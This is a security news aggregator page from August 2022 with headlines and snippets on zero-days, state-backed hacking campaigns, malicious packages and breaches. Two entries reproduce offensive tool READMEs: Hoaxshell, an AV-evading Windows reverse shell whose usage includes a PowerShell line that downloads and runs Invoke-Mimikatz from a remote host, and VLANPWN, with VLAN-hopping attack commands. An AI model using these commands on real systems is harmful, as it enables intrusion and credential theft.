Google Address Another Zero-Day Vulnerability In Chrome Browser
Heads up, Chrome users! Google has rolled out another major Chrome browser update fixing a… Google Address Another Zero-Day Vulnerability In Chrome Browser on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/18/google-address-another-zero-day-vulnerability-in-chrome-browser/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities
Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices. The list of issues is below - CVE-2022-32893 - An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content CVE-2022-32894 - An
https://thehackernews.com/2022/08/apple-releases-security-updates-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybercriminals Developing BugDrop Malware to Bypass Android Security Features
In a sign that malicious actors continue to find ways to work around Google Play Store security protections, researchers have spotted a previously undocumented Android dropper trojan that's currently in development. "This new malware tries to abuse devices using a novel technique, not seen before in Android malware, to spread the extremely dangerous Xenomorph banking trojan, allowing criminals
https://thehackernews.com/2022/08/cybercriminals-developing-bugdrop.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malicious Browser Extensions Targeted Over a Million Users So Far This Year
More than 1.31 million users attempted to install malicious or unwanted web browser extensions at least once, new findings from cybersecurity firm Kaspersky show. "From January 2020 to June 2022, more than 4.3 million unique users were attacked by adware hiding in browser extensions, which is approximately 70% of all users affected by malicious and unwanted add-ons," the company said. As many as
https://thehackernews.com/2022/08/malicious-browser-extensions-targeted.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

North Korea Hackers Spotted Targeting Job Seekers with macOS Malware
The North Korea-backed Lazarus Group has been observed targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets. Slovak cybersecurity firm ESET linked it to a campaign dubbed "Operation In(ter)ception" that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the aerospace and military sectors into
https://thehackernews.com/2022/08/north-korea-hackers-spotted-targeting.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Xiaomi Phones with MediaTek Chips Found Vulnerable to Forged Payments
Security flaws have been identified in Xiaomi Redmi Note 9T and Redmi Note 11 models, which could be exploited to disable the mobile payment mechanism and even forge transactions via a rogue Android app installed on the devices. Check Point said it found the flaws in devices powered by MediaTek chipsets during a security analysis of the Chinese handset maker's Trusted Execution Environment (TEE)
https://thehackernews.com/2022/08/xiaomi-phones-with-mediatek-chips-found.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple fixed two new zero-day flaws exploited by threat actors
Apple addressed two zero-day vulnerabilities, exploited by threat actors, affecting iOS, iPadOS, and macOS devices. Apple this week released security updates for iOS, iPadOS, and macOS platforms to address two zero-day vulnerabilities exploited by threat actors. Apple did not share details about these attacks. The two flaws are: CVE-2022-32893 – An out-of-bounds issue in WebKit which. An attacker can trigger the […] The post Apple fixed two new zero-day flaws exploited by threat actors appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134527/security/apple-zero-day-flaws-2.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PoC exploit code for critical Realtek RCE flaw released online
Exploit code for a critical vulnerability affecting networking devices using Realtek RTL819x system on a chip released online. The PoC exploit code for a critical stack-based buffer overflow issue, tracked as CVE-2022-27255 (CVSS 9.8), affecting networking devices using Realtek's RTL819x system on a chip was released online. The issue resides in the Realtek's SDK for […] The post PoC exploit code for critical Realtek RCE flaw released online appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134515/breaking-news/realtek-rce-poc-exploit.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Warning!! New Chrome 0-Day Bug Being Exploited In The Wide
Google Chrome released a new security update for Windows, Linux & Mac users and an update for a new high severity Zero-day bug that is being actively exploited wide by unknown threat actors. Chrome 104 was released with the fixes of 11 security vulnerabilities, including one critical severity bug and six high severity bugs reported […] The post Warning!! New Chrome 0-Day Bug Being Exploited In The Wide appeared first on GBHackers On Security.
https://gbhackers.com/warning-new-chrome-0-day-bug-being-exploited-in-the-wide/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malicious Browser Extensions Targeted Over 7 Million Users
In the past two years alone, more than 7 million users have endeavored to install malicious browser extensions on their systems. While the majority of these extensions are used by the threat actors as an adware to display advertisements to users. As of 2022, malicious extensions for web browsers were most commonly used by adware […] The post Malicious Browser Extensions Targeted Over 7 Million Users appeared first on GBHackers On Security.
https://gbhackers.com/malicious-browser-extensions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu de la veille

New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild
Google on Tuesday rolled out patches for Chrome browser for desktops to contain an actively exploited high-severity zero-day flaw in the wild. Tracked as CVE-2022-2856, the issue has been described as a case of insufficient validation of untrusted input in Intents. Security researchers Ashley Shen and Christian Resell of Google Threat Analysis Group have been credited with reporting the flaw on
https://thehackernews.com/2022/08/new-google-chrome-zero-day.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Researchers Link Multi-Year Mass Credential Theft Campaign to Chinese Hackers
A Chinese state-sponsored threat activity group named RedAlpha has been attributed to a multi-year mass credential theft campaign aimed at global humanitarian, think tank, and government organizations. "In this activity, RedAlpha very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations," Recorded Future disclosed in a new
https://thehackernews.com/2022/08/researchers-link-multi-year-mass.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lean Security 101: 3 Tips for Building Your Framework
Cobalt, Lazarus, MageCart, Evil, Revil — cybercrime syndicates spring up so fast it's hard to keep track. Until…they infiltrate your system. But you know what's even more overwhelming than rampant cybercrime? Building your organization's security framework.  CIS, NIST, PCI DSS, HIPAA, HITrust, and the list goes on. Even if you had the resources to implement every relevant industry standard and
https://thehackernews.com/2022/08/lean-security-101-3-tips-for-building.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RubyGems Makes Multi-Factor Authentication Mandatory for Top Package Maintainers
RubyGems, the official package manager for the Ruby programming language, has become the latest platform to mandate multi-factor authentication (MFA) for popular package maintainers, following the footsteps of NPM and PyPI. To that end, owners of gems with over 180 million total downloads are mandated to turn on MFA effective August 15, 2022. "Users in this category who do not
https://thehackernews.com/2022/08/rubygems-makes-multi-factor.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ÆPIC and SQUIP Vulnerabilities Found in Intel and AMD Processors
A group of researchers has revealed details of a new vulnerability affecting Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors. Dubbed ÆPIC Leak, the weakness is the first-of-its-kind to architecturally disclose sensitive data in a manner that's akin to an "uninitialized memory read in the CPU itself." "In contrast to transient execution
https://thehackernews.com/2022/08/pic-and-squip-vulnerabilities-found-in.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Warns About Phishing Attacks by Russia-linked Hackers
Microsoft on Monday revealed it took steps to disrupt phishing operations undertaken by a "highly persistent threat actor" whose objectives align closely with Russian state interests. The company is tracking the espionage-oriented activity cluster under its chemical element-themed moniker SEABORGIUM, which it said overlaps with a hacking group also known as Callisto, COLDRIVER, and TA446. "
https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple security updates fix 2 zero-days used to hack iPhones, Macs
Apple has released emergency security updates today to fix two zero-day vulnerabilities previously exploited by attackers to hack iPhones, iPads, or Macs. [...]
https://www.bleepingcomputer.com/news/security/apple-security-updates-fix-2-zero-days-used-to-hack-iphones-macs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

BlackByte ransomware gang is back with new extortion tactics
The BlackByte ransomware is back with version 2.0 of their operation, including a new data leak site utilizing new extortion techniques borrowed from LockBit. [...]
https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-gang-is-back-with-new-extortion-tactics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Windows PowerToys OCR tool will let you copy text from images
Microsoft PowerToys is getting a new utility called PowerOCR that lets you select text in an image and copy it directly to the Windows clipboard. [...]
https://www.bleepingcomputer.com/news/microsoft/new-windows-powertoys-ocr-tool-will-let-you-copy-text-from-images/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

North Korean hackers use signed macOS malware to target IT job seekers
North Korean hackers from the Lazarus group have been using a signed malicious executable for macOS to impersonate Coinbase and lure in employees in the financial technology sector. [...]
https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-signed-macos-malware-to-target-it-job-seekers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malicious PyPi packages turn Discord into password-stealing malware
A dozen malicious PyPi packages have been discovered installing malware that modifies the Discord client to become an information-sealing backdoor and stealing data from web browsers and Roblox. [...]
https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-turn-discord-into-password-stealing-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malware devs already bypassed Android 13's new security feature
Android malware developers are already adjusting their tactics to bypass a new 'Restricted settings' security feature introduced by Google in the newly released Android 13. [...]
https://www.bleepingcomputer.com/news/security/malware-devs-already-bypassed-android-13s-new-security-feature/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Google fixes fifth Chrome zero-day bug exploited this year
Google has released a security update for Chrome browser that addresses close to a dozen vulnerabilities, including a zero-day flaw that is being exploited in the wild. [...]
https://www.bleepingcomputer.com/news/security/google-fixes-fifth-chrome-zero-day-bug-exploited-this-year/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

China-linked RedAlpha behind multi-year credential theft campaign
A China-linked APT group named RedAlpha is behind a long-running mass credential theft campaign aimed at organizations worldwide. Recorded Future researchers attributed a long-running mass credential theft campaign to a Chinese nation-state actor tracked RedAlpha. The campaign targeted global humanitarian, think tank, and government organizations. Experts believe RedAlpha is a group of contractors conducting cyber-espionage activity on behalf of […] The post China-linked RedAlpha behind multi-year credential theft campaign appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134519/apt/redalpha-china-credential-theft-campaign.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bugdrop dropper includes features to circumvent Google's security Controls
Researchers have discovered a previously undocumented Android dropper, dubbed BugDrop, that’s still under development. Recently, researchers from ThreatFabric discovered a previously undetected Android dropper, dubbed BugDrop, which is under active development and was designed to bypass security features that will be implemented in the next release of the Google OS. The experts noticed something unusual in the […] The post Bugdrop dropper includes features to circumvent Google’s security Controls appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134508/malware/bugdrop-android-malware.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Google fixed a new Chrome Zero-Day actively exploited in the wild
Google addressed a dozen vulnerabilities in the Chrome browser, including the fifth Chrome zero-day flaw exploited this year. Google this week released security updates to address a dozen vulnerabilities in its Chrome browser for desktops including an actively exploited high-severity zero-day flaw in the wild. The actively exploited flaw, tracked as CVE-2022-2856, is an Insufficient validation […] The post Google fixed a new Chrome Zero-Day actively exploited in the wild appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134501/security/google-fifth-chrome-zero-day-exploited.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

North Korea-linked APT targets Job Seekers with macOS malware
The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware working also on Intel and M1 chipsets. ESET researchers continue to monitor a cyberespionage campaign, tracked as “Operation In(ter)ception,” that has been active at least since June 2020. The campaign targets employees working in the aerospace and military sectors and leverages […] The post North Korea-linked APT targets Job Seekers with macOS malware appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134491/malware/north-korea-mac-malware-m1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ÆPIC Leak is the first CPU flaw able to architecturally disclose sensitive data
Researchers uncovered a new flaw, dubbed ÆPIC, in Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors. The ÆPIC Leak (CVE-2022-21233) is the first architecturally CPU bug that could lead to the disclosure of sensitive data and impacts most 10th, 11th and 12th generation Intel CPUs. ÆPIC Leak works on […] The post ÆPIC Leak is the first CPU flaw able to architecturally disclose sensitive data appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134478/security/aepic-leak-architecturally-flaw.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Zoom fixed two flaws in macOS App that were disclosed at DEF CON
Zoom addressed two high-severity vulnerabilities in its macOS app that were disclosed at the DEF CON conference. Zoom last week released macOS updates to fix two high-severity flaws in its macOS app that were disclosed at the DEF CON conference. Technical details of the vulnerabilities were disclosed at the DEF CON conference by security researcher […] The post Zoom fixed two flaws in macOS App that were disclosed at DEF CON appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134468/security/zoom-macos-app-flaws.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Swiss Post relaunches e-voting bug bounty program
Ethical hackers invited to stress test election infrastructure
https://portswigger.net/daily-swig/swiss-post-relaunches-e-voting-bug-bounty-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Developers still struggling with security issues during code reviews, study finds
The road to DevSecOps isn't always the smoothest
https://portswigger.net/daily-swig/developers-still-struggling-with-security-issues-during-code-reviews-study-finds
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hoaxshell - An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic
hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates it's own PowerShell payload and it supports encryption (ssl). So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots). Video Presentation Screenshots Find more screenshots here. Installation git clone https://github.com/t3l3machus/hoaxshellcd ./hoaxshellsudo pip3 install -r requirements.txtchmod +x hoaxshell.py Usage Basic shell session over http sudo python3 hoaxshell.py -s <your_ip> When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject on the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the "rawpayload" prompt command or start hoaxshell with the -r argument. After the payload has been executed on the victim, you'll be able to run PowerShell commands against it. Encrypted shell session (https): # Generate self-signed certificate:openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365# Pass the cert.pem and key.pem as arguments:sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem> The generated PowerShell payload will be longer in length because of an additional block of code that disables the ssl certificate validation. Grab session mode In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine. sudo python3 hoaxshell.py -s <your_ip> -g Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc). Limitations The shell is going to hang if you execute a command that initiates an interactive session. Example: # this command will execute succesfully and you will have no problem: > powershell echo 'This is a test'# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:> powershell# In the same manner, you won't have a problem executing this:> cmd /c dir /a# But this will cause your hoaxshell to hang:> cmd.exe So, if you for example would like to run mimikatz throught hoaxshell you would need to invoke the commands: hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"' Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context. Future I am currently working on some auxiliary-type prompt commands to automate parts of host enumeration. Download Hoaxshell
http://www.kitploit.com/2022/08/hoaxshell-unconventional-windows.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Disrupted Russia-Linked APT SEABORGIUM Targeting NATO Countries
Microsoft Threat Intelligence Center (MSTIC) has noticed and taken measures to interrupt campaigns launched by SEABORGIUM, a Russia-based actor launching persistent phishing, credential and data theft, intrusions, and hack-and-leak campaigns tied to espionage targeting NATO countries. Insights into SEABORGIUM's Activities SEABORGIUM is active since 2017, a highly persistent threat actor, repeatedly targeting the same organizations […] The post Microsoft Disrupted Russia-Linked APT SEABORGIUM Targeting NATO Countries appeared first on GBHackers On Security.
https://gbhackers.com/microsoft-disrupted-russia/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SOC Analyst Training – Cyber Attack Intrusion Analysis With SIEM Tools|From Scratch To Advanced
SOC Training is one of the most important concernS in order to build a Quality Security Operation Center Team to fight against advanced threats that target the organization network. Sophisticated detection and prevention technologies are mandatory implementations by security experts since cyber attacks are rising day by day. SO implementing dedicated SOC operation and SOC […] The post SOC Analyst Training – Cyber Attack Intrusion Analysis With SIEM Tools|From Scratch To Advanced appeared first on GBHackers On Security.
https://gbhackers.com/soc-training-from-scratch/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

35 malicious apps found on Google Play Store, installed by 2m users
By Waqas Another day, another set of nasty applications on the official Google Play Store. The growing efforts of cyber-criminals… This is a post from HackRead.com Read the original post: 35 malicious apps found on Google Play Store, installed by 2m users
https://www.hackread.com/35-malicious-apps-google-play-store-millions-installs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Hat USA 2022 and DEF CON 30
Black Hat 2022 USA Briefings wrapped up this past week, along with its sister conference Defcon 30. Coming back from the COVID hiatus, the conferences were enthusiastically full compared to the 2021 ghost town.
https://securelist.com/black-hat-usa-2022-and-def-con-30/107184/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu à J-2

Ransomware & RDDoS, Why They Are Similar but Different
Both ransomware and distributed denial of service (DDoS) attacks alone have long been a potent… Ransomware & RDDoS, Why They Are Similar but Different on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/16/ransomware-rddos-why-they-are-similar-but-different/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Many Ears from Now: 5 Authentication Modalities that Will Blow Your Mind
Biometrics are evolving: soon it will be possible to identify you by your ear shape… Many Ears from Now: 5 Authentication Modalities that Will Blow Your Mind on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/16/many-ears-from-now-5-authentication-modalities-that-will-blow-your-mind/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Evil PLC Attack Weaponizes PLCs to Breach OT and Enterprise Networks
Cybersecurity researchers have elaborated a novel attack technique that weaponizes programmable logic controllers (PLCs) to gain an initial foothold in engineering workstations and subsequently invade the operational technology (OT) networks. Dubbed "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider
https://thehackernews.com/2022/08/new-evil-plc-attack-weaponizes-plcs-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unified Threat Management: The All-in-One Cybersecurity Solution
UTM (Unified threat management) is thought to be an all-in-one solution for cybersecurity. In general, it is a versatile software or hardware firewall solution integrated with IPS (Intrusion Prevention System) and other security services. A universal gateway allows the user to manage network security with one comprehensive solution, which makes the task much easier. In addition, compared to a
https://thehackernews.com/2022/08/unified-threat-management-all-in-one.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Russian State Hackers Continue to Attack Ukrainian Entities with Infostealer Malware
Russian state-sponsored actors are continuing to strike Ukrainian entities with information-stealing malware as part of what's suspected to be an espionage operation. Symantec, a division of Broadcom Software, attributed the malicious campaign to a threat actor tracked Shuckworm, also known as Actinium, Armageddon, Gamaredon, Primitive Bear, and Trident Ursa. The findings have been corroborated
https://thehackernews.com/2022/08/russian-state-hackers-continue-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Nearly 1,900 Signal Messenger Accounts Potentially Compromised in Twilio Hack
Popular end-to-end encrypted messaging service Signal on Monday disclosed the cyberattack aimed at Twilio earlier this month may have exposed the phone numbers of roughly 1,900 users. "For about 1,900 users, an attacker could have attempted to re-register their number to another device or learned that their number was registered to Signal," the company said. "All users can rest assured that
https://thehackernews.com/2022/08/nearly-1900-signal-messenger-accounts.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SOVA Android Banking Trojan Returns With New Capabilities and Targets
The SOVA Android banking trojan is continuing to be actively developed with upgraded capabilities to target no less than 200 mobile applications, including banking apps and crypto exchanges and wallets, up from 90 apps when it started out. That's according to the latest findings from Italian cybersecurity firm Cleafy, which found newer versions of the malware sporting functionality to intercept
https://thehackernews.com/2022/08/sova-android-banking-trojan-returns-new.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Windows KB5012170 update causing BitLocker recovery screens, boot issues
Windows users who have installed a new KB5012170 security update for Secure Boot have encountered various issues, ranging from boots failing with BitLocker Recovery prompts to performance issues. [...]
https://www.bleepingcomputer.com/news/microsoft/windows-kb5012170-update-causing-bitlocker-recovery-screens-boot-issues/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Exploit out for critical Realtek flaw affecting many networking devices
Exploit code has been released for a critical vulnerability affecting networking devices with Realtek's RTL819x system on a chip (SoC), which are estimated to be in the millions. [...]
https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RTLS systems vulnerable to MiTM attacks, location manipulation
Security researchers have uncovered multiple vulnerabilities impacting UWB (ultra-wideband) RTLS (real-time locating systems), enabling threat actors to conduct man-in-the-middle attacks and manipulate tag geo-location data. [...]
https://www.bleepingcomputer.com/news/security/rtls-systems-vulnerable-to-mitm-attacks-location-manipulation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malicious browser extensions targeted almost 7 million people
Almost 7 million users have attempted to install malicious browser extensions since 2020, with 70% of those extensions used as adware to target users with advertisements. [...]
https://www.bleepingcomputer.com/news/security/malicious-browser-extensions-targeted-almost-7-million-people/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New MailChimp breach exposed DigitalOcean customer email addresses
DigitalOcean is warning customers that a recent MailChimp security breach exposed the email addresses of some customers, with a small number receiving unauthorized password resets. [...]
https://www.bleepingcomputer.com/news/security/new-mailchimp-breach-exposed-digitalocean-customer-email-addresses/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Clop gang targeted UK drinking water supplier South Staffordshire Water
A cyber attack disrupted the IT operations of South Staffordshire Water, a company supplying drinking water to 1.6M consumers daily. South Staffordshire Water has issued a statement confirming the security breach, the company pointed out that the attack did not impact the safety and water distribution systems. South Staffordshire Water plc known as South Staffs […] The post Clop gang targeted UK drinking water supplier South Staffordshire Water appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134450/cyber-crime/south-staffordshire-water-cyberattack.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Russia-linked Gamaredon APT continues to target Ukraine
Russia-linked Gamaredon APT group targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad, Symantec warns. The Computer Emergency Response Team of Ukraine (CERT-UA) confirmed the ongoing cyber espionage campaign. Symantec and TrendMicro first discovered the Gamaredon […] The post Russia-linked Gamaredon APT continues to target Ukraine appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134438/apt/gamaredon-continues-target-ukraine.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Legitimate hacking activities under UK law proposed by ‘expert consensus'
Contentious edge case activities are no excuse for further delaying of ‘much overdue' reform, say campaigners
https://portswigger.net/daily-swig/legitimate-hacking-activities-under-uk-law-proposed-by-expert-consensus
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Multiple cloud vendors impacted by PostgreSQL vulnerability that exposed enterprise databases
Flaws discovered in various PostgreSQL-as-a-Service offerings, including those from Microsoft and Google
https://portswigger.net/daily-swig/multiple-cloud-vendors-impacted-by-postgresql-vulnerability-that-exposed-enterprise-databases
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DEF CON – “don't worry, the elections are safe” edition
Don't worry, elections are safe. Our Security Researcher Cameron Camp provide us highlights from the DEF CON 30 conference. The post DEF CON – “don't worry, the elections are safe” edition appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/16/def-con-2022-elections-safe-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How a spoofed email passed the SPF check and landed in my inbox
The Sender Policy Framework can't help prevent spam and phishing if you allow billions of IP addresses to send as your domain The post How a spoofed email passed the SPF check and landed in my inbox appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/16/spoofed-email-passed-spf-check-inbox/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

VLANPWN - VLAN Attacks Toolkit
VLAN attacks toolkit DoubleTagging.py - This tool is designed to carry out a VLAN Hopping attack. As a result of injection of a frame with two 802.1Q tags, a test ICMP request will also be sent. DTPHijacking.py - A script for conducting a DTP Switch Spoofing/Hijacking attack. Sends a malicious DTP-Desirable frame, as a result of which the attacker's machine becomes a trunk channel. The impact of this attack is that you can bypass the segmentation of VLAN networks and see all the traffic of VLAN networks. python3 DoubleTagging.py --help.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s. SS. SS. SS. SS. SS. SS. SS.sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%SSS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%SSS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S SS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%S SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:; SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,. `:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'VLAN Double Tagging inject tool. Jump into another VLAN!Author: @necreas1ng, <necreas1ng@protonmail.com>usage: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKERoptions: -h, --help show this help message and exit --interface INTERFACE Specify your network interface --nativevlan NATIVEVLAN Specify the Native VLAN ID --targetvlan TARGETVLAN Specify the target VLAN ID for attack --victim VICTIM Specify the target IP --attacker ATTACKER Specify the attacker IP Example: python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim 10.10.20.24 --attacker 10.10.10.54 python3 DTPHijacking.py --help.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s. SS. SS. SS. SS. SS. SS. SS.sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%SSS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%SSS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%SSS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%SSS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,. `:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'DTP Switch Hijacking tool. Become a trunk!Author: @necreas1ng, <necreas1ng@protonmail.com>usage: DTPHijacking.py [-h] --interface INTERFACE options:-h, --help show this help message and exit--interface INTERFACE Specify your network interface Example: python3 DTPHijacking.py --interface eth0 Download VLANPWN
http://www.kitploit.com/2022/08/vlanpwn-vlan-attacks-toolkit.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Twilio Hack -Over 1,900 Signal Users' Phone Numbers were Exposed in the Data Breach
Signal, a cross-platform centralized encrypted instant messaging service declares that a data breach at Cloud Communication Company Twilio exposed almost 1,900 Signal users' phone numbers. Twilio provides phone number verification services for Signal and notably on August 4th, it disclosed that attackers hacked its network. “All users can rest assured that their message history, contact […] The post Twilio Hack -Over 1,900 Signal Users’ Phone Numbers were Exposed in the Data Breach appeared first on GBHackers On Security.
https://gbhackers.com/signal-users-phone-numbers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Researchers Hacked SpaceX Operated Starlink Satellite Using Modchip
In a hacking attempt carried out by a security researcher, Lennert Wouters, at the Belgian university KU Leuven, the Starlink satellite-based internet system operated by SpaceX was successfully hacked.  The most shocking thing is that it cost him approx 25 dollars only to make a homemade circuit board to hack the system. A series of […] The post Researchers Hacked SpaceX Operated Starlink Satellite Using Modchip appeared first on GBHackers On Security.
https://gbhackers.com/researchers-hacked-spacex-operated-starlink-satellite-using-25-modchip/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

White Hat Hacker at DefCon Jaikbreaks Tractor to Play Doom
By Waqas The hacker “Sick Codes” managed to jailbreak the display/control unit of one of the John Deere Tractor models… This is a post from HackRead.com Read the original post: White Hat Hacker at DefCon Jaikbreaks Tractor to Play Doom
https://www.hackread.com/defcon-hacker-jaikbreaks-tractor-play-doom-game/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Two more malicious Python packages in the PyPI
We used our internal automated system for monitoring open-source repositories and discovered two other malicious Python packages in the PyPI. They were masquerading as one of the most popular open-source packages named “requests“.
https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat in your browser: what dangers innocent-looking extensions hold for users
In this research, we observed various types of threats that mimic useful web browser extensions, and the number of users attacked by them.
https://securelist.com/threat-in-your-browser-extensions/107181/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu des jours précédents

Researcher Hacked Space-X Starlink Via A Tool
A white-hacker demonstrated how he hacked SpaceX's satellite-based internet system Starlink. The researcher could successfully… Researcher Hacked Space-X Starlink Via A Tool on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/15/researcher-hacked-space-x-starlink-via-a-25-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to become a video game tester
